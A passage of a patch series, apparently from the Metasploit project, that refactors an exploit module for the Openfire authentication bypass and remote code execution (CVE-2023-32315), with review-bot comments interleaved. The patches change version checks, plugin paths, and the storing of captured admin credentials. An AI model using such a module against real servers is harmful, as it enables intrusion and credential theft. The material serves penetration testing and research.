@@ -187,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote plugin_author = datastore['PLUGINAUTHOR'] || Rex::Text.rand_text_alphanumeric(8..15) plugin_desc = datastore['PLUGINDESC'] || Rex::Text.rand_text_alphanumeric(8..15) - plugin_xml = File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315', 'plugin.xml'), 'rb', &:read) + plugin_xml = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315', 'plugin.xml')) plugin_xml.gsub!(/PLUGINNAME/, @plugin_name) plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc) plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author) @@ -234,7 +232,9 @@ class MetasploitModule < Msf::Exploit::Remote openfire = get_version return CheckCode::Safe if openfire.empty? # check first for patched versions - return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.6.8') || Rex::Version.new(openfire['version']) == Rex::Version.new('4.7.5') + return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.6.8') + return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.7.5') + return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.8.0') if Rex::Version.new(openfire['version']) < Rex::Version.new('4.8.0') && Rex::Version.new(openfire['version']) >= Rex::Version.new('3.10.0') CheckCode::Vulnerable("Openfire version is #{openfire['version']}") From b15d595de2b44aa2bcb28e70ace9773eb47e99cd Mon Sep 17 00:00:00 2001 
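Review bot: In the `@@ -234,7 +232,9 @@` hunk the fixed releases are matched by equality only, so any later maintenance release on the 4.6 or 4.7 branch would fall through to the range test and be reported as vulnerable. The added `== Rex::Version.new('4.8.0')` return is redundant because the range test below already requires `< Rex::Version.new('4.8.0')`. Parsing the version once and comparing by range covers both: `v = Rex::Version.new(openfire['version'])` followed by `return CheckCode::Safe("Openfire version is #{v}") if v >= Rex::Version.new('4.7.5') || (v >= Rex::Version.new('4.6.8') && v < Rex::Version.new('4.7.0'))`. `check` starts and ends outside the hunk.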
From: bwatters Date: Fri, 14 Jul 2023 12:47:04 -0500 Subject: [PATCH 4/7] Adjust files to be better shared --- .../changelog.html | 0 .../lib/plugin-metasploit.jar | Bin .../logo_large.gif | Bin .../logo_small.gif | Bin .../{CVE-2023-32315 => openfire_plugin}/plugin.xml | 0 .../{CVE-2023-32315 => openfire_plugin}/readme.html | 0 .../{CVE-2008-6508 => openfire_plugin}/Example.java | 0 modules/exploits/multi/http/openfire_auth_bypass.rb | 4 ++-- .../http/openfire_auth_bypass_rce_cve_2023_32315.rb | 4 ++-- 9 files changed, 4 insertions(+), 4 deletions(-) rename data/exploits/{CVE-2023-32315 => openfire_plugin}/changelog.html (100%) rename data/exploits/{CVE-2023-32315 => openfire_plugin}/lib/plugin-metasploit.jar (100%) rename data/exploits/{CVE-2023-32315 => openfire_plugin}/logo_large.gif (100%) rename data/exploits/{CVE-2023-32315 => openfire_plugin}/logo_small.gif (100%) rename data/exploits/{CVE-2023-32315 => openfire_plugin}/plugin.xml (100%) rename data/exploits/{CVE-2023-32315 => openfire_plugin}/readme.html (100%) rename external/source/exploits/{CVE-2008-6508 => openfire_plugin}/Example.java (100%) diff --git a/data/exploits/CVE-2023-32315/changelog.html b/data/exploits/openfire_plugin/changelog.html similarity index 100% rename from data/exploits/CVE-2023-32315/changelog.html rename to data/exploits/openfire_plugin/changelog.html diff --git a/data/exploits/CVE-2023-32315/lib/plugin-metasploit.jar b/data/exploits/openfire_plugin/lib/plugin-metasploit.jar similarity index 100% rename from data/exploits/CVE-2023-32315/lib/plugin-metasploit.jar rename to data/exploits/openfire_plugin/lib/plugin-metasploit.jar diff --git a/data/exploits/CVE-2023-32315/logo_large.gif b/data/exploits/openfire_plugin/logo_large.gif similarity index 100% rename from data/exploits/CVE-2023-32315/logo_large.gif rename to data/exploits/openfire_plugin/logo_large.gif 
diff --git a/data/exploits/CVE-2023-32315/logo_small.gif b/data/exploits/openfire_plugin/logo_small.gif similarity index 100% rename from data/exploits/CVE-2023-32315/logo_small.gif rename to data/exploits/openfire_plugin/logo_small.gif diff --git a/data/exploits/CVE-2023-32315/plugin.xml b/data/exploits/openfire_plugin/plugin.xml similarity index 100% rename from data/exploits/CVE-2023-32315/plugin.xml rename to data/exploits/openfire_plugin/plugin.xml diff --git a/data/exploits/CVE-2023-32315/readme.html b/data/exploits/openfire_plugin/readme.html similarity index 100% rename from data/exploits/CVE-2023-32315/readme.html rename to data/exploits/openfire_plugin/readme.html diff --git a/external/source/exploits/CVE-2008-6508/Example.java b/external/source/exploits/openfire_plugin/Example.java similarity index 100% rename from external/source/exploits/CVE-2008-6508/Example.java rename to external/source/exploits/openfire_plugin/Example.java diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index 79e1bc0418..25bd69751a 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb 
@@ -141,12 +141,12 @@ class MetasploitModule < Msf::Exploit::Remote ] jar = Rex::Zip::Jar.new - jar.add_files(files, File.join(Msf::Config.data_directory, "exploits", "CVE-2008-6508")) + jar.add_files(files, File.join(Msf::Config.data_directory, "exploits", "openfire_plugin")) plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(8+rand(8)) plugin_desc = datastore['PLUGINDESC'] || rand_text_alphanumeric(8+rand(8)) - plugin_xml = File.open(File.join(Msf::Config.data_directory, "exploits", "CVE-2008-6508", "plugin.xml"), "rb") {|fd| fd.read() } + plugin_xml = File.open(File.join(Msf::Config.data_directory, "exploits", "openfire_plugin", "plugin.xml"), "rb") {|fd| fd.read() } plugin_xml.gsub!(/PLUGINNAME/, plugin_name) plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc) plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author) diff --git a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb index d0e72f336e..1753193e53 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb 
@@ -179,13 +179,13 @@ class MetasploitModule < Msf::Exploit::Remote ] jar = Rex::Zip::Jar.new - jar.add_files(files, File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315')) + jar.add_files(files, File.join(Msf::Config.data_directory, 'exploits', 'openfire_plugin')) @plugin_name = datastore['PLUGINNAME'] || Rex::Text.rand_text_alphanumeric(8..15) plugin_author = datastore['PLUGINAUTHOR'] || Rex::Text.rand_text_alphanumeric(8..15) plugin_desc = datastore['PLUGINDESC'] || Rex::Text.rand_text_alphanumeric(8..15) - plugin_xml = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315', 'plugin.xml')) + plugin_xml = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'openfire_plugin', 'plugin.xml')) plugin_xml.gsub!(/PLUGINNAME/, @plugin_name) plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc) plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author) From f608424242c040891811197ffc318db4715125df Mon Sep 17 00:00:00 2001 From: "H00die.Gr3y" <38109035+h00die-gr3y@users.noreply.github.com> Date: Sat, 15 Jul 2023 12:02:22 +0200 Subject: [PATCH 5/7] Apply suggestions from code review Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com> Co-authored-by: Brendan --- .../http/openfire_auth_bypass_rce_cve_2023_32315.rb | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb index 1753193e53..e3880aee8d 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb @@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote def get_version # get Openfire version number from the admin console login page - openfire = {} + openfire = nil res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login.jsp'), 
@@ -87,9 +87,10 @@ class MetasploitModule < Msf::Exploit::Remote }) if res && res.code == 200 version = res.body.match(/Openfire,\s*\D*:\s*\d\.\d{1,2}\.\d/) - openfire['version'] = version[0].split(':')[1].strip unless version.nil? + openfire = Rex::Version.new(version[0].split(':')[1].strip) unless version.nil? end - return openfire + + openfire end def auth_bypass @@ -237,7 +238,7 @@ class MetasploitModule < Msf::Exploit::Remote return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.8.0') if Rex::Version.new(openfire['version']) < Rex::Version.new('4.8.0') && Rex::Version.new(openfire['version']) >= Rex::Version.new('3.10.0') - CheckCode::Vulnerable("Openfire version is #{openfire['version']}") + CheckCode::Appears("Openfire version is #{openfire['version']}") else CheckCode::Safe("Openfire version is #{openfire['version']}") end From 0ff2ca4f40b42509dfa2a0c28136f88a83b9ce97 Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Sun, 16 Jul 2023 18:43:21 +0000 Subject: [PATCH 6/7] updates based on latest comments --- ...openfire_auth_bypass_rce_cve_2023_32315.rb | 43 +++++++++++++------ 1 file changed, 31 insertions(+), 12 deletions(-) diff --git a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb index e3880aee8d..31339d7e0a 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb @@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote def get_version # get Openfire version number from the admin console login page - openfire = nil + openfire_version = nil res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login.jsp'), 
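Review bot: The string handed to `Rex::Version.new` in the first hunk comes from a pattern ending in `\d\.\d{1,2}\.\d`, which stops after one patch digit, so a release with a two-digit patch number (a constructed example: 4.7.10 would be read as 4.7.1) is silently truncated before `check` compares it. A capture group removes both the truncation and the `split(':')[1].strip` step: `version = res.body.match(/Openfire,\s*\D*:\s*(\d+(?:\.\d+)+)/)` followed by `openfire = Rex::Version.new(version[1]) unless version.nil?`. `get_version` starts above this hunk, so the request options are not visible here.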
@@ -87,10 +87,10 @@ class MetasploitModule < Msf::Exploit::Remote }) if res && res.code == 200 version = res.body.match(/Openfire,\s*\D*:\s*\d\.\d{1,2}\.\d/) - openfire = Rex::Version.new(version[0].split(':')[1].strip) unless version.nil? + openfire_version = Rex::Version.new(version[0].split(':')[1].strip) unless version.nil? end - - openfire + + openfire_version end def auth_bypass @@ -142,6 +142,23 @@ class MetasploitModule < Msf::Exploit::Remote return @admin_login end + def report_valid_login_creds(user, pwd) + credential_data = { + module_fullname: fullname, + username: user, + private_data: pwd, + private_type: :password, + workspace_id: myworkspace_id, + proof: cookie_jar.cookies, + status: Metasploit::Model::Login::Status::SUCCESSFUL + }.merge(service_details) + + cred_res = create_credential_and_login(credential_data) + unless cred_res.nil? + print_status("Credentials for user:#{user} are added to the database...") + end + end + def login_admin_user # login using admin hash with admin username and password # returns true if login successful else returns false @@ -163,6 +180,8 @@ class MetasploitModule < Msf::Exploit::Remote } }) if res && res.code == 200 && res.body.match(/login box/).nil? + # store_valid_credential‎(user: @admin_login['username'], private: @admin_login['password'], proof: cookie_jar.cookies) + report_valid_login_creds(@admin_login['username'], @admin_login['password']) return true else return false 
@@ -230,17 +249,17 @@ class MetasploitModule < Msf::Exploit::Remote end def check - openfire = get_version - return CheckCode::Safe if openfire.empty? + openfire_version = get_version + return CheckCode::Safe if openfire_version.nil? # check first for patched versions - return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.6.8') - return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.7.5') - return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.8.0') + return CheckCode::Safe("Openfire version is #{openfire_version}") if openfire_version == Rex::Version.new('4.6.8') + return CheckCode::Safe("Openfire version is #{openfire_version}") if openfire_version == Rex::Version.new('4.7.5') + return CheckCode::Safe("Openfire version is #{openfire_version}") if openfire_version == Rex::Version.new('4.8.0') - if Rex::Version.new(openfire['version']) < Rex::Version.new('4.8.0') && Rex::Version.new(openfire['version']) >= Rex::Version.new('3.10.0') - CheckCode::Appears("Openfire version is #{openfire['version']}") + if openfire_version < Rex::Version.new('4.8.0') && openfire_version >= Rex::Version.new('3.10.0') + CheckCode::Appears("Openfire version is #{openfire_version}") else - CheckCode::Safe("Openfire version is #{openfire['version']}") + CheckCode::Safe("Openfire version is #{openfire_version}") end end From 7f35abff86261ebed76bcf8c1cd4723f4e7766ec Mon Sep 17 00:00:00 2001 
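Review bot: `check` returns `CheckCode::Safe` when `get_version` yields nil, but nil only means the login page was not retrieved or carried no recognisable version string, so the target has not been assessed at all; `return CheckCode::Unknown if openfire_version.nil?` reports that honestly. The three `==` tests also treat only the exact releases 4.6.8, 4.7.5 and 4.8.0 as fixed, so any later 4.6.x or 4.7.x build would fall into the `< 4.8.0` branch and be reported as `Appears`. Assuming those are the first fixed releases of their lines, comparing ranges (at least 3.10.0 and below 4.6.8, or at least 4.7.0 and below 4.7.5) would avoid that false positive.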
From: h00die-gr3y Date: Tue, 18 Jul 2023 08:38:06 +0000 Subject: [PATCH 7/7] =?UTF-8?q?fixed=20the=20invalid=20character=20at=20th?= =?UTF-8?q?e=20store=5Fvalid=5Fcredential=E2=80=8E=20function?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...openfire_auth_bypass_rce_cve_2023_32315.rb | 20 +------------------ 1 file changed, 1 insertion(+), 19 deletions(-) diff --git a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb index 31339d7e0a..131d479c84 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb @@ -142,23 +142,6 @@ class MetasploitModule < Msf::Exploit::Remote return @admin_login end - def report_valid_login_creds(user, pwd) - credential_data = { - module_fullname: fullname, - username: user, - private_data: pwd, - private_type: :password, - workspace_id: myworkspace_id, - proof: cookie_jar.cookies, - status: Metasploit::Model::Login::Status::SUCCESSFUL - }.merge(service_details) - - cred_res = create_credential_and_login(credential_data) - unless cred_res.nil? - print_status("Credentials for user:#{user} are added to the database...") - end - end - def login_admin_user # login using admin hash with admin username and password # returns true if login successful else returns false @@ -180,8 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote } }) if res && res.code == 200 && res.body.match(/login box/).nil? - # store_valid_credential‎(user: @admin_login['username'], private: @admin_login['password'], proof: cookie_jar.cookies) - report_valid_login_creds(@admin_login['username'], @admin_login['password']) + store_valid_credential(user: @admin_login['username'], private: @admin_login['password'], proof: cookie_jar.cookies) return true else return false
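Review bot: The `store_valid_credential` call added in the second hunk passes `proof: cookie_jar.cookies`, which looks like the whole cookie collection rather than a short text proof, so the admin session cookie would presumably be written to the workspace database next to the password; confirm that is intended, or pass a brief string instead. The comment at the top of `login_admin_user`, visible as context in the first hunk, still documents only the true/false result; I would add `# on success the credentials are saved to the database with store_valid_credential`. The method body starts outside the second hunk.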